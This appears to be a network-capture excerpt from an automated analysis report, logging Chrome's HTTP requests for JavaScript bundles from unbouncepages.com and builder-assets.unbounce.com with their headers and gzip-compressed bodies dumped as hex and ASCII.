                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156563044 CEST1236INData Raw: 4c 86 53 f2 0e 98 d0 93 36 20 ab da 57 19 e3 b1 a3 6f 3d fc fb 3d d0 3b 37 71 bf 47 53 cb 09 d9 90 a1 51 d9 8c 8d 2e 0f e0 f1 86 3c a4 05 1e 53 3e f6 c4 98 32 30 fd 0a f5 a6 3f a0 e1 19 a6 3c 3a 84 a4 25 3d fe 00 4f fd 52 5c 84 5b 20 26 a9 88 f5
                                                                                                                                                                                                                                                                                Data Ascii: LS6 Wo==;7qGSQ.<S>20?<:%=OR\[ &d:)P&XQsSH.UrZ2}dyN5XUZBUs6Cyx_$.@x4t[vHz=Hi[~$_ [y$3n7d#_-CqOa=En
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156596899 CEST1236INData Raw: 45 7d 1a 33 a2 98 9b 08 66 2d e4 87 2f af 55 f2 8e e5 f4 f6 c1 31 b9 1e 54 4b 07 b6 69 bf 99 36 28 96 26 32 9d e4 6a fd 86 0b c4 61 34 dc a3 ef 3c 09 3a b3 59 34 8c c3 22 aa 35 f1 34 3b a1 54 76 b5 2a ed a2 4a 9e 25 fc db 19 0a a8 be b8 c5 72 e9
                                                                                                                                                                                                                                                                                Data Ascii: E}3f-/U1TKi6(&2ja4<:Y4"54;Tv*J%rj\rP*6XqE~@0%1z)zifB/>&{<c/x~[~+^6#[GVcw8p"o(J4kMu\l:Aow i:F;Opz
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156610012 CEST1236INData Raw: 57 29 7c 09 c8 0b 71 09 9d 4d 64 9e 3b aa 84 fb d1 e1 57 db 11 56 40 a6 40 9e aa b8 d1 b8 76 ed 38 40 cf 4b 53 87 13 97 cd c2 69 fc 67 34 3c 53 b0 49 3c a0 99 d2 b2 71 3f e6 96 53 4c dd bf 19 6e bf 66 11 d0 59 ce c0 bc 99 61 61 35 25 e5 5a e4 ec
                                                                                                                                                                                                                                                                                Data Ascii: W)|qMd;WV@@v8@KSig4<SI<q?SLnfYaa5%Zr5|'0c8_17=&r0FZ; l8<iggzwCdDMcrR\\rQqANHtA:j.x(yz'3uwc^*<;wB*0hs
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156620026 CEST1236INData Raw: 6e 65 82 4f 07 f7 38 da 5f f5 22 bc 0d 0e da 6f 8f 7f 6d bf 55 4e c5 97 c1 a7 ee db 9e 78 1f 5c 96 17 a7 cd 3d 73 5f 07 7f 34 1a ef 3b 97 d6 26 2a bd c0 57 c0 93 fb ef 51 14 a6 90 66 b0 ff af f7 f6 c4 79 f7 75 2f b8 84 3d ff 1e 68 88 9e f6 4b 33
                                                                                                                                                                                                                                                                                Data Ascii: neO8_"omUNx\=s_4;&*WQfyu/=hK3(9qJ{Ido+X!Z A@UpcpW!:;(1$Zj.h[zjZ0j:V.A#NY aR|bSpd/7_Aaql
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.161536932 CEST1236INData Raw: 53 08 a4 5d 40 29 49 e7 54 a9 61 fc 09 e1 5d fb 0c ad 66 ab e9 54 04 3c 31 f3 84 3c 9a 53 45 4b af 2e 9d 8c b5 fa bc 45 94 3d 96 51 96 d6 64 91 4a 47 5b 3e 7d 5a ad 32 3a 10 b3 c2 42 24 58 ed 7d 5f 3a 25 be 4b 66 ea 88 b0 94 80 5f 2b 76 87 d0 29
                                                                                                                                                                                                                                                                                Data Ascii: S]@)ITa]fT<1<SEK.E=QdJG[>}Z2:B$X}_:%Kf_+v)R!e*O'+GmWleq-<SW\`uf*f)0t`l(3!GCT@MC:w}]0CXnjz($fs)oukJM0r Nh?


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                4192.168.2.650272172.64.153.235805924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.547127962 CEST646OUTGET /_ub/static/ts/e6c35f50fd3355ae56cc4292c3ae66e2e57ced28.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: unbouncepages.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: ubvs=984ef446-4894-43d3-86b3-f7f03d0fb80e; ubvt=v2%7C984ef446-4894-43d3-86b3-f7f03d0fb80e%7Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012%3Aa%3Asingle%3Asingle; __cf_bm=na6y8zAWEEPd_WLfIs3pLGcfi8Vd1ydOe7voOG5uk04-1728497213-1.0.1.1-EYMXS1taezGgDDe3SggsgK5J86VdxHU_mJBouxY9Uxucl4vkgcCZjQD6GuXseSnmOSL3savSTNGz2ucgc_iq.Q
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031234980 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:06:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 08 May 2024 22:13:34 GMT
                                                                                                                                                                                                                                                                                ETag: W/"a7eeb377929f3b60727095f859013d59"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                x-amz-version-id: y0uC0xE0yu95rDa35ZEYf2K128n3gwGH
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 dd50f5bdd8da1cdd9e698cc2d6f8e828.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: EWR53-C2
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: fq2Li19aI1sielXb8RAfiB_u317QX_UTzMXadUkPLvMfORp2QCwYcw==
                                                                                                                                                                                                                                                                                Age: 13286777
                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                Expires: Thu, 09 Oct 2025 18:06:54 GMT
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8d004ea978e27293-EWR
                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                Data Raw: 33 64 64 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 6b 7b db 38 b2 e6 f7 fd 15 12 a7 87 0b 44 30 2d c9 97 38 94 61 1d c7 49 3a ee 49 62 77 ec 74 d2 ad 51 7b 28 0a 92 18 53 a0 42 82 be c4 e4 fe f6 7d 0a 00 49 50 a2 93 f4 9c 39 cf ee 5c 62 0a c4 9d 40 a1 2e 6f 15 b6 9f b4 5b af a2 b8 15 06 3e e3 09 6b 05 7c 16 c5 4b 4f 04 11 6f ad 42 e6 25 ac 95 30 d6 12 b1 e7 5f b3 d8 f9 9c 38 6f 4e 4f 5e be bb 78 e9 88 3b d1 7a b2 fd bf da b3 94 fb 90 1d e1 87 1b 2f 6e 31 fa b0 b3 bf ef 96 a9 4c 25 73 fa 90 8a d9 81 fb 90 88 38 e0 f3 cb e8 f9 bd 60 49 2d 5b cc 44 1a f3 16 77 26 01 77 6a d9 50 ca 59 e2 7b 2b 86 18 f7 a3 29 fb f0 fe f4 24 5a ae 22 ce b8 40 0c 63 9c 93 09 e4 bb 8c 2e 64 b1 a6 6a a7 6c b3 a4 aa 53 35 58 ab 40 55 9a 93 49 c0 bf d5 e3 59 14 23 35 b8 d1 98 08 da 1d 88 43 e6 84 8c cf c5 62 20 3a 1d cc 9d 55 9a 2c 50 7f 6f cf 66 8e bf f0 e2 93 68 ca 8e 05 12 18 0f 8a d1 7e ab eb 3f 58 bf 2a e9 cc e2 68 79 a2 1b 41 6c 24 c6 46 2b ce e7 28 e0 c8 b2 70 9e e7 03 e6 b0 bb 55 14 8b 84 f2 9c 1c ec ee 6c 7e 2c 22 [TRUNCATED]
                                                                                                                                                                                                                                                                                Data Ascii: 3dde}k{8D0-8aI:IbwtQ{(SB}IP9\b@.o[>k|KOoB%0_8oNO^x;z/n1L%s8`I-[Dw&wjPY{+)$Z"@c.djlS5X@UIY#5Cb :U,Pofh~?X*hyAl$F+(pUl~,"ZO^|___\~&uKkzmAHF_xNHf,2/N3?S_D1X
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031306028 CEST1236INData Raw: d0 db 7f da eb 3d db d9 b3 85 03 fd 41 8c 1c e0 6c b7 ff f4 a0 bf b7 b7 b3 df ad 92 fb bb 78 50 cd 7a 77 c0 ab 09 e7 9d 0e 66 23 3e a6 c2 51 3d 40 f0 ab 9c 62 96 93 d8 e3 d3 68 f9 ed 65 32 60 47 dd 01 db da 2a be dd 5b 4f 2c 9c 59 18 45 31 ea ef
                                                                                                                                                                                                                                                                                Data Ascii: =AlxPzwf#>Q=@bhe2`G*[O,YE1??U=7Q<"$B!q`>qx7pM@j@l$d+GGG-kkv,vv#{{\;,__d;:$$1Ir6#hqN;
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031341076 CEST1236INData Raw: bc b2 cb a2 09 e5 b6 2d 97 77 48 79 96 8d c6 64 46 e1 ac c8 b2 87 1c 3b 3c 9a b2 2c 8b c9 94 de 44 c1 b4 d5 6d 53 ca 1c 5f ee 76 f6 65 58 3d ba 91 9c ee 34 0c 29 9d 65 99 7a 98 aa 16 6e 68 80 f0 40 bf b3 6d 34 a3 31 1d f5 b2 9b 51 77 4c 6e 46 3d
                                                                                                                                                                                                                                                                                Data Ascii: -wHydF;<,DmS_veX=4)eznh@m41QwLnF=?xFscnFOK<7L_G{a\K0Y/iGtwj+=Zvm[e-;dkeV.8mA^q#+MsCmx3O2
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031373024 CEST1236INData Raw: 75 96 65 3b 38 47 1e ae d4 70 74 7b 0e aa b7 2a e1 9f 1d 48 d9 aa 25 6d 43 d2 95 85 5d 0f b4 7f f0 81 02 e2 e3 9c f8 b5 4f 5b 72 2a c6 71 50 1c b4 c2 a9 16 b1 62 30 d8 90 3b fe 9d cb 1d bf 3c ea e5 7a 90 3a 52 c4 86 6b ca 7a f3 fb 26 b7 81 f0 17
                                                                                                                                                                                                                                                                                Data Ascii: ue;8Gpt{*H%mC]O[r*qPb0;<z:Rkz&hw](y|}n.*PXPMd:iCL`]og(x0><{\rK'QmR<>Lu&riiiN!K,B&8VY
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031443119 CEST1236INData Raw: b5 6d 98 2c 91 23 f9 25 62 dc 38 6b 85 e1 13 4c c7 45 92 d2 bf 48 dd 70 21 7d 94 6b b5 34 2f 23 a0 93 58 13 35 bd a8 22 12 7c 8b 42 94 dc 62 49 47 9e 47 51 c8 3c ae c8 82 14 7d a2 aa 4f ad b5 05 eb 63 12 c0 d2 36 d5 22 73 73 8f 68 29 c7 29 d1 32
                                                                                                                                                                                                                                                                                Data Ascii: m,#%b8kLEHp!}k4/#X5"|BbIGGQ<}Oc6"ssh))26Vo5^mYk=zQweso\>.*]MtTNVNAVyTrszq\yUYJP?[WN>4Lut)Qoxz6~"_nn#i?Yaw$`a
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031477928 CEST1236INData Raw: 52 38 47 65 e5 dc da e2 85 5a af 30 65 73 8c 89 f5 44 67 2b 12 fb f5 5c 3d 8c 89 d1 dc d7 aa 39 b5 70 88 a0 bf 20 2b 66 33 16 c7 2c b6 08 97 cb 17 f2 3a 8b 98 cd 70 96 15 af 9b de 4a 86 a8 38 87 84 94 bf 2b ab b0 54 24 cd 10 77 44 b4 aa d8 31 11
                                                                                                                                                                                                                                                                                Data Ascii: R8GeZ0esDg+\=9p +f3,:pJ8+T$wD1{JL*ZWRu"o:}MY<Di=9_a]TD`iOFC{lYO+:l -+lcjVl.s][NEAZ
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031512976 CEST1236INData Raw: d0 61 f8 be 91 5e c3 89 62 2d af 31 39 b3 ed e0 a8 07 c6 c4 89 74 d7 7e 15 a6 c9 82 c5 3a 43 ed e0 9e 64 d9 95 b2 f4 48 ee e6 39 6d b0 1f 6d d8 12 a4 fc 68 b1 1b 01 bb 10 7e 19 ee 13 ef d4 e7 f9 80 38 69 77 01 4a 23 69 35 7a 8b 7e 43 00 80 bb 81
                                                                                                                                                                                                                                                                                Data Ascii: a^b-19t~:CdH9mmh~8iwJ#i5z~Ch"WMp\VZuavE0P\TRXY!Hf<Tmw#uY#%RAC<f>`7WQL?u"
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031544924 CEST1236INData Raw: db 0a 06 dd 04 ac 42 d2 be 81 c9 48 4e a2 d2 a5 81 37 0b 11 0c 9c b7 19 ed 93 88 d1 1d 12 30 ba 4b 3c 46 f7 88 cf e8 3e 49 19 7d 4a 12 46 0f 48 c8 e8 33 32 63 b4 d7 ad 44 83 29 6b b6 b8 2e d9 32 8a 83 af 6c fa 5b 90 04 e2 24 4a b9 70 7b a5 19 96
                                                                                                                                                                                                                                                                                Data Ascii: BHN70K<F>I}JFH32cD)k.2l[$Jp{;>6s #6yJ>PQ.dQ316JZqqeo)QtoqK>COe#Dk)xr@e1Y&,+\9M
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031579018 CEST332INData Raw: 74 07 c0 2f 9d 96 e8 b4 4f ac 4a 9b a6 90 78 c6 1a 75 9d c0 36 43 cf aa ec 45 ee 8f 50 c5 7b 8e ca 17 31 9b c5 16 79 cb d1 73 60 0d 8c 46 d3 38 94 e9 ef 00 27 ce 71 a1 1a 9f c3 77 b9 e6 64 a2 60 f6 ed 63 9e 65 13 b0 4f df f3 ba 31 b8 f8 00 85 3e
                                                                                                                                                                                                                                                                                Data Ascii: t/OJxu6CEP{1ys`F8'qwd`ceO1>N!WPAP^s+/&7KQ4<^Bs\'/ZyKm_m+:F$S7P81y*UkC9&S7JunIA&ttL-wge7F2
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.031615973 CEST1236INData Raw: 1b 55 b6 4f 67 16 c5 2f 3d 7f cd c8 07 ea 79 56 12 62 50 a8 1a 73 1a 93 ea 15 28 a4 4b 5d 7d 69 aa 90 f1 c0 5a de 74 1a f0 79 4b 4d 7a ab 28 61 11 86 e5 12 82 d0 a0 40 77 7c 7a 83 30 49 28 23 61 2d aa df 4c ad fc 10 a2 76 f1 42 97 29 d6 48 32 e1
                                                                                                                                                                                                                                                                                Data Ascii: UOg/=yVbPs(K]}iZtyKMz(a@w|z0I(#a-LvB)H2$j2,!g?v!c*F,w-!EaQ8m(^eYD)q&+'3#v4HN_X7}^JUtX\fc$1p66X$70+D@}
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.036669970 CEST1236INData Raw: 4a 6c f6 68 b7 db 25 bb dd 1e d9 ed ee 90 dd 5e 97 ec f6 fb 63 4c 66 4e 30 05 65 6a e0 33 4c 4e 64 cc 9b 33 f9 ef 29 a7 0f 4c db 92 da 3d 12 f0 44 78 a1 fe 51 e0 3f 25 ad 96 f1 e3 c9 b1 41 8d 2a 55 e7 a5 9e f2 0d 95 e6 25 2b 74 9a 97 ac d8 2c 35
                                                                                                                                                                                                                                                                                Data Ascii: Jlh%^cLfN0ej3LNd3)L=DxQ?%A*U%+t,5lsNgNnj`3lg$~tQ$}LFp=b*IjEj*+,WhK"T)^5 ,OE?FyZu/Oc/%1E:$gBe


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                5192.168.2.65027413.224.189.30805924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.359589100 CEST317OUTGET /published-js/main.bundle-ef43f79.z.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: builder-assets.unbounce.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.050734997 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 41618
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Date: Mon, 09 Sep 2024 20:43:57 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 09 Sep 2024 20:00:10 GMT
                                                                                                                                                                                                                                                                                ETag: "b5949b3be4687909b13b22dfba27d0ea"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                x-amz-version-id: 36sbtEfRDGy2dcgnPBKNKf28_9VinVuP
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: sgtXO7j8WmdKl31XBdyzl3bfMhQoMJ08rxY-uktbI-WsQ6XRmddFqQ==
                                                                                                                                                                                                                                                                                Age: 2582579
                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 08 c8 53 df 66 00 03 6d 61 69 6e 2e 62 75 6e 64 6c 65 2e 6a 73 00 ec 5b 0b 73 db 46 92 fe 2b 22 f6 4e 05 84 23 88 52 b2 7b 09 68 14 d7 71 9c dd 5c d9 b1 2f 72 2e 55 47 31 2a 90 1c 8a b3 06 31 cc 60 60 59 2b 72 7f fb 7d 3d 0f 0c f8 90 9d b8 72 55 7b 75 57 a5 a2 80 79 f6 f4 f4 e3 eb 9e 41 6f d1 54 33 2d 64 15 57 c9 c3 bb 42 9d a8 fc 61 3b f4 85 27 32 e6 b6 58 0f 15 d7 8d aa 62 35 e6 93 cd 26 d6 39 3d e4 0f 22 e3 ac cc 7a 17 8c bf 5f 4b a5 eb ec 61 bb 65 15 aa d2 59 51 96 b1 4e 5d 39 d3 2c 3c cb 04 2f 65 de 1b 30 9d 24 be 74 2b d3 55 5e 31 99 ce 72 85 df 79 de 52 c6 d1 19 d4 c9 54 d2 63 b2 d9 bc 9a fe 8d cf 74 3a e7 0b 51 f1 d7 4a ae b9 d2 f7 a6 d9 03 af 9a 15 57 c5 b4 e4 19 86 bf e5 3a ab b6 c9 16 e3 a9 ce 78 c9 43 d4 54 b6 f7 3c ea e5 fa 7e cd e5 e2 e4 ea 7e 35 95 e5 e9 a9 fd 9f 6a 79 a5 95 a8 6e df 14 b7 a7 a7 8f cd 78 d8 96 81 5d 65 c3 b3 e8 a5 9c 37 25 8f b6 09 7b ac 73 74 73 c3 6b d7 cc 77 eb 0d 2c b9 3a 90 ab 19 08 16 8b f8 e2 94 9f 9e 82 f1 32 06 d7 d8 97 a7 3c b1 5b 82 bd 41 ed 17 54 [TRUNCATED]
                                                                                                                                                                                                                                                                                Data Ascii: Sfmain.bundle.js[sF+"N#R{hq\/r.UG1*1``Y+r}=rU{uWyAoT3-dWBa;'2Xb5&9="z_KaeYQN]9,</e0$t+U^1ryRTct:QJW:xCT<~~5jynx]e7%{stskw,:2<[ATI3U5SKLmk;fUSA"!bJ>*4V}i_u*6v"@Exuw1SQ]L%xTlsjGmvT:,*"H4cZI-i_UYVIp/6y]~TpV"jTb~2!(F
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.050838947 CEST224INData Raw: 64 79 97 ce e5 0c 9b 59 61 c5 f1 80 a9 b4 50 aa b8 ff 56 c9 55 02 45 9e c9 0a 74 35 33 2d 55 67 b1 bf 34 5c dd 5f f1 92 53 f9 d3 b2 74 6a 0f 91 4d 60 08 3e b8 3a 4b ac 5e 8a 1a 12 8a 5f 6c 9b 58 91 29 f8 c6 12 be d9 1c 91 89 fd fd e5 d9 83 5b 67
                                                                                                                                                                                                                                                                                Data Ascii: dyYaPVUEt53-Ug4\_StjM`>:K^_lX)[g14"kj3E)B^3[&Yy;5un; TWe5s*~gYQxkd1oR82"SQ.^ %fOcu=Z]V
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.050898075 CEST1236INData Raw: 9e 2d 79 bd d9 1c a9 aa 5f da 4a 2f 38 c7 1a dd f1 e9 5b a1 f7 1a 26 61 ce 91 ce d0 bc 50 e8 e5 3a 8f b0 a2 dd 12 22 8d 4c c7 96 75 b7 eb 88 58 3d a5 ca 74 81 da 51 78 44 7d 66 df 02 55 75 29 66 dc e9 74 42 c3 b6 02 71 54 cd ac 5b e8 f4 f7 cd 47
                                                                                                                                                                                                                                                                                Data Ascii: -y_J/8[&aP:"LuX=tQxD}fUu)ftBqT[G]<9jk3]W;_|A~FA=[7{q4mR@i<JXy5%,3{6Nx[0j}V?PI'[E0-DnR*K#Rc|rfg]U
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.050932884 CEST1236INData Raw: a6 f8 b6 31 e9 29 b2 9b 84 e3 0e 32 84 47 6c 31 78 b7 fd 40 e6 0e e8 2a e9 a4 8f da 65 f1 b1 ca c3 d2 46 55 a6 88 a3 18 2b 21 28 b6 83 ef b8 b6 24 b7 c9 8e 0f f0 2c 79 78 34 85 f8 d1 3c dc 2e 99 84 f2 7d 5e 88 92 74 c5 b1 fc cb 15 c2 85 5d 59 04
                                                                                                                                                                                                                                                                                Data Ascii: 1)2Gl1x@*eFU+!($,yx4<.}^t]YKoMIcB{9oE"IKeLLXPTN9s4$ZA*V*s#RBE{m>GyOy|VvoFCB*%ZUU:&3oY 7
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.050966024 CEST1236INData Raw: 17 7f fa 12 bf 97 03 2a a6 7f 05 fd 5e 7e 69 7e bf 32 bf 0b fa fd 23 7e 3f 47 a3 eb 66 c1 17 8b 49 ff 9c 2d f3 f3 f1 75 75 ad ae f5 04 db 2b 68 f0 a7 67 ff 55 9c fd 7d e2 fe 0f ce be ea 9f a5 93 cf b2 eb f3 eb f3 73 a0 b9 f3 ec 7a de ff 97 73 00
                                                                                                                                                                                                                                                                                Data Ascii: *^~i~2#~?GfI-uu+hgU}szsii34KF19kV4cIv]Pcav)x"Xe4ac(sd/Ey;+4e2k2%PJc<h]%AQ3Q{^3b^,1Pc?f
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.051001072 CEST1236INData Raw: a9 38 8b c8 d3 d0 f6 10 14 ca cb 0e cc de de 84 28 3d 7f a8 bb 47 69 ce 7d 86 e3 d0 61 7d 27 5c c0 3c 83 c9 70 c8 fb d0 7e 9a eb ea 56 eb 4c 0c 4c 37 9d bc 23 33 17 df cd 77 07 7a 38 a5 4b 1f 43 33 94 41 cf 99 2d 67 74 6b 5b 75 60 bb 36 b0 ce c8
                                                                                                                                                                                                                                                                                Data Ascii: 8(=Gi}a}'\<p~VLL7#3wz8KC3A-gtk[u`6jar~e4}mv8X!&nMFMc?TSl+|=r1kpz`u{Ng*3K=EKJ*-(+F}IvW^D^xhY2{Vwrh5
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.051038027 CEST44INData Raw: de 38 16 05 30 77 38 ea ef 68 f5 25 60 17 66 9f ea e5 04 10 c4 64 a9 f7 91 4b 7b b0 86 7f fe ed f6 94 f3 bf 64 4b 86 ce ab d2 7a 2a
                                                                                                                                                                                                                                                                                Data Ascii: 80w8h%`fdK{dKz*
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.051070929 CEST1236INData Raw: 4c 86 53 f2 0e 98 d0 93 36 20 ab da 57 19 e3 b1 a3 6f 3d fc fb 3d d0 3b 37 71 bf 47 53 cb 09 d9 90 a1 51 d9 8c 8d 2e 0f e0 f1 86 3c a4 05 1e 53 3e f6 c4 98 32 30 fd 0a f5 a6 3f a0 e1 19 a6 3c 3a 84 a4 25 3d fe 00 4f fd 52 5c 84 5b 20 26 a9 88 f5
                                                                                                                                                                                                                                                                                Data Ascii: LS6 Wo==;7qGSQ.<S>20?<:%=OR\[ &d:)P&XQsSH.UrZ2}dyN5XUZBUs6Cyx_$.@x4t[vHz=Hi[~$_ [y$3n7d#_-CqOa=En
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.051103115 CEST1236INData Raw: 45 7d 1a 33 a2 98 9b 08 66 2d e4 87 2f af 55 f2 8e e5 f4 f6 c1 31 b9 1e 54 4b 07 b6 69 bf 99 36 28 96 26 32 9d e4 6a fd 86 0b c4 61 34 dc a3 ef 3c 09 3a b3 59 34 8c c3 22 aa 35 f1 34 3b a1 54 76 b5 2a ed a2 4a 9e 25 fc db 19 0a a8 be b8 c5 72 e9
                                                                                                                                                                                                                                                                                Data Ascii: E}3f-/U1TKi6(&2ja4<:Y4"54;Tv*J%rj\rP*6XqE~@0%1z)zifB/>&{<c/x~[~+^6#[GVcw8p"o(J4kMu\l:Aow i:F;Opz
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.051140070 CEST1236INData Raw: 57 29 7c 09 c8 0b 71 09 9d 4d 64 9e 3b aa 84 fb d1 e1 57 db 11 56 40 a6 40 9e aa b8 d1 b8 76 ed 38 40 cf 4b 53 87 13 97 cd c2 69 fc 67 34 3c 53 b0 49 3c a0 99 d2 b2 71 3f e6 96 53 4c dd bf 19 6e bf 66 11 d0 59 ce c0 bc 99 61 61 35 25 e5 5a e4 ec
                                                                                                                                                                                                                                                                                Data Ascii: W)|qMd;WV@@v8@KSig4<SI<q?SLnfYaa5%Zr5|'0c8_17=&r0FZ; l8<iggzwCdDMcrR\\rQqANHtA:j.x(yz'3uwc^*<;wB*0hs
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:56.056140900 CEST1236INData Raw: 6e 65 82 4f 07 f7 38 da 5f f5 22 bc 0d 0e da 6f 8f 7f 6d bf 55 4e c5 97 c1 a7 ee db 9e 78 1f 5c 96 17 a7 cd 3d 73 5f 07 7f 34 1a ef 3b 97 d6 26 2a bd c0 57 c0 93 fb ef 51 14 a6 90 66 b0 ff af f7 f6 c4 79 f7 75 2f b8 84 3d ff 1e 68 88 9e f6 4b 33
                                                                                                                                                                                                                                                                                Data Ascii: neO8_"omUNx\=s_4;&*WQfyu/=hK3(9qJ{Ido+X!Z A@UpcpW!:;(1$Zj.h[zjZ0j:V.A#NY aR|bSpd/7_Aaql


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                0192.168.2.64970940.113.103.199443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:04:58 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 76 79 53 46 6a 58 39 67 6b 4b 68 65 4f 55 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 37 38 31 64 64 61 62 37 66 65 32 35 65 65 32 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: NvySFjX9gkKheOU7.1Context: 2781ddab7fe25ee2
